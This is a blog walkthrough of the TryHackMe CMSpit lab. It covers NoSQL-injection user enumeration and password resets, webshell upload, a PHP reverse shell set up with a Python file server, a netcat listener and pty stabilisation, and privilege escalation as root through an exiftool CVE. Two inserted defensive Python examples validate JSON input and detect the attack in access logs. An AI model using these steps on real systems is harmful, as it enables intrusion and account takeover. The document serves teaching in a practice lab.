narancs's blog

TryHackMe – CMSpit walkthrough


Logo of CMSpit room on TryHackMe

This is a walkthrough of the CMSpit room on TryHackMe. We need to gain access to the target machine through a vulnerable CMS and escalate to root.

You've identified that the CMS installed on the web server has several vulnerabilities that allow attackers to enumerate users and change account passwords. Your mission is to exploit these vulnerabilities and compromise the web server.


What is the name of the Content Management System (CMS) installed on the server?

We can get this answer from the login page of the website.


What is the version of the Content Management System (CMS) installed on the server?

I found the answer by checking the source code of the login page.


What is the path that allows user enumeration?

By knowing the CMS name and the version, we can start looking for known exploits. I found the following website that explains the exploit in great detail: In section 1 ‘Using the $eq operator’, there are several screenshots taken from Burp Suite that show the URL path in question.
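The enumeration works because the reset endpoint accepts a JSON object in place of the username and hands it to the database query, so an object such as {"$eq": ...} is evaluated as a query operator. As an added example (not part of this walkthrough and not the CMS's own code), here is a check an application can run on the request body before it reaches the query; the request bodies, field name and function names are illustrative assumptions:

```python
import json
from typing import Any

# Constructed sample request bodies for a reset endpoint; not captured from the target.
SAMPLE_BODIES = {
    "plain": '{"user": "admin"}',
    "eq_operator": '{"user": {"$eq": "admin"}}',
    "regex_operator": '{"user": {"$regex": "^a"}}',
    "nested_operator": '{"user": {"profile": {"$ne": null}}}',
}


def contains_operator(value: Any) -> bool:
    """True if any key in a (possibly nested) JSON value starts with '$'."""
    if isinstance(value, dict):
        return any(k.startswith("$") or contains_operator(v) for k, v in value.items())
    if isinstance(value, list):
        return any(contains_operator(v) for v in value)
    return False


def build_filter_unsafe(body: dict) -> dict:
    """Vulnerable pattern: whatever JSON the client sent becomes the query value,
    so an object like {"$eq": "admin"} is interpreted as a query operator."""
    return {"user": body.get("user")}


def build_filter_safe(body: dict) -> dict:
    """Hardened: the identifier must be a plain string and the whole body
    must be free of operator keys before it is used in a query."""
    user = body.get("user")
    if not isinstance(user, str) or contains_operator(body):
        raise ValueError("identifier must be a plain string without query operators")
    return {"user": user}


def classify(raw_body: str) -> str:
    """Return 'accepted' or 'rejected' for one raw JSON request body."""
    try:
        body = json.loads(raw_body)
        if not isinstance(body, dict):
            return "rejected"
        build_filter_safe(body)
        return "accepted"
    except ValueError:  # json.JSONDecodeError is a subclass of ValueError
        return "rejected"


if __name__ == "__main__":
    for name, raw in SAMPLE_BODIES.items():
        print(f"{name:16s} -> {classify(raw)}")
```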


How many users can you identify when you reproduce the user enumeration attack?

I found an exploit for this vulnerability on GitHub:

The code is sending 2 requests through a proxy:

    resetrequest = + "/auth/requestreset" , json=request_data , proxies={"http" :""})
    token_request = + "/auth/resetpassword"  , json=token_data , proxies={"http" :""})

So we need to either start a proxy on port 8080 (e.g. Burp Suite) or remove the proxies={"http" :""} arguments from the 2 function calls in the code. Then we can execute the script against the target.

    python3 http://<IP_ADDRESS>/


Number of users in the output of the script :)

What is the path that allows you to change user account passwords?

The answer can be found in the above script on GitHub by looking at the change_pass function and checking the URL path to which it sends a request.




Compromise the Content Management System (CMS). What is Skidy's email?

If you have successfully executed the script above, then you can see in the output that the password of the admin user has been changed to P@ssw0rd. We can log in with these credentials and visit the /accounts page to find the email address of Skidy.


The e-mail address of the Skidy user from the /accounts page

What is the web flag?

You can also see something similar in the output of the script:

    [+] Bingoo, File has been deployed successfully : vd1XDi.php
    [+] File's location :
    [*] Execution example :
    [+] Output : uid=33(www-data) gid=33(www-data) groups=33(www-data)
    [+] Good luck for Privilege Escalation :)

This means that a webshell was uploaded to the target, and we can execute commands with it.
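From the defender's side, both the hammering of the reset endpoints and the request for the dropped .php file leave traces in the web server's access log. As an added example (not part of the walkthrough), a small detector run over constructed log lines; the client addresses, timestamps and status codes are made up, and the .php file name is the one printed by the script output above:

```python
import re
from collections import Counter

# Constructed access-log lines (combined-log style); client addresses and times are
# made up, the .php file name is the one printed by the exploit script above.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "POST /auth/requestreset HTTP/1.1" 200 312
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "POST /auth/requestreset HTTP/1.1" 200 312
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "POST /auth/requestreset HTTP/1.1" 200 312
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "POST /auth/resetpassword HTTP/1.1" 200 150
10.0.0.9 - - [01/Jan/2024:10:01:00 +0000] "GET /auth/login HTTP/1.1" 200 2048
10.0.0.5 - - [01/Jan/2024:10:02:10 +0000] "GET /vd1XDi.php HTTP/1.1" 200 58
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
RESET_PATHS = {"/auth/requestreset", "/auth/resetpassword"}
# Heuristic: the deployed file had a random six-character name; legitimate
# six-letter scripts (config.php) would also match, so treat hits as leads.
RANDOM_PHP_RE = re.compile(r"^/(?:.*/)?[A-Za-z0-9]{6}\.php$")


def parse_line(line: str):
    """Return the fields of one log line, or None if it does not parse."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def analyze(log_text: str, reset_threshold: int = 3) -> list:
    """Flag clients hammering the reset endpoints and successful GETs of random .php names."""
    reset_hits = Counter()
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]  # drop any query string
        if rec["method"] == "POST" and path in RESET_PATHS:
            reset_hits[rec["ip"]] += 1
        elif rec["method"] == "GET" and RANDOM_PHP_RE.match(path) and rec["status"] == "200":
            findings.append(("possible_webshell_access", rec["ip"], path))
    for ip, count in reset_hits.items():
        if count >= reset_threshold:
            findings.append(("password_reset_burst", ip, count))
    return findings
```

Running analyze(SAMPLE_LOG) yields one password_reset_burst finding for 10.0.0.5 and one possible_webshell_access finding for /vd1XDi.php.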


Once we visit this page, we will see a list of the files in the root directory of the web server. We can see that there is a file named webflag.php, so we can use the cat command to display the content of this file. Then we need to view the source code of the page, otherwise the output is not visible because it is PHP code.



Grab the flag from webflag.php

Compromise the machine and enumerate collections in the document database installed in the server. What is the flag in the database?

I gained a shell on the target using the following steps:
  • I downloaded the reverse shell from
  • I changed the following lines accordingly
    $ip = ''; // CHANGE THIS
    $port = 1234; // CHANGE THIS
  • I started a Python HTTP server to serve the file over HTTP
    python3 -m http.server
  • I used the webshell to download the reverse shell on the target machine
  • I started a listener on the port I specified in the reverse shell
    nc -lvnp 1234
  • I visited and I received a shell.

Then I stabilized the shell with the following commands:

    python3 -c 'import pty;pty.spawn("/bin/bash")'
    export TERM=xterm
    stty raw -echo; fg

I started looking around on the host. Finally, I found a file in the home directory of stux named .dbshell. One of the commands in the file contained the flag that was inserted into the database.


Get the flag from the .dbshell file

What is the user.txt flag?

The .dbshell file contains a command that was used to insert the user stux into the database. We can use the same password to switch to the stux user on Linux, because the password was reused.


Switch to the stux user with the su command and grab the flag from user.txt

What is the CVE number for the vulnerability affecting the binary assigned to the system user? Answer format: CVE-0000-0000

We can check which commands stux can execute with sudo.

    stux@ubuntu:~$ sudo -l
    Matching Defaults entries for stux on ubuntu:
        env_reset, mail_badpass,
    User stux may run the following commands on ubuntu:
        (root) NOPASSWD: /usr/local/bin/exiftool

I checked for vulnerabilities of exiftool and I found the following:


What is the utility used to create the PoC file?

I found an exploit for the vulnerability here:

In the script file, there is a function called dependencies that defines the following variable.

    deps = {'bzz':"sudo apt install djvulibre-bin",'djvumake':"sudo apt install djvulibre-bin",'exiftool':"sudo apt install exiftool"}

The name of the utility is listed in these dependencies.


Escalate your privileges. What is the flag in root.txt?

Using the exploit at we can create a malicious jpg file on our local machine. Then we can transfer that file to the target to perform the exploit.

Install the dependencies:

    sudo apt install djvulibre-bin exiftool

Run the exploit:

    python3 -c '/bin/bash'

Transfer the file to the target (e.g. using Python HTTP server).

Use exiftool on the target, and get the root flag!
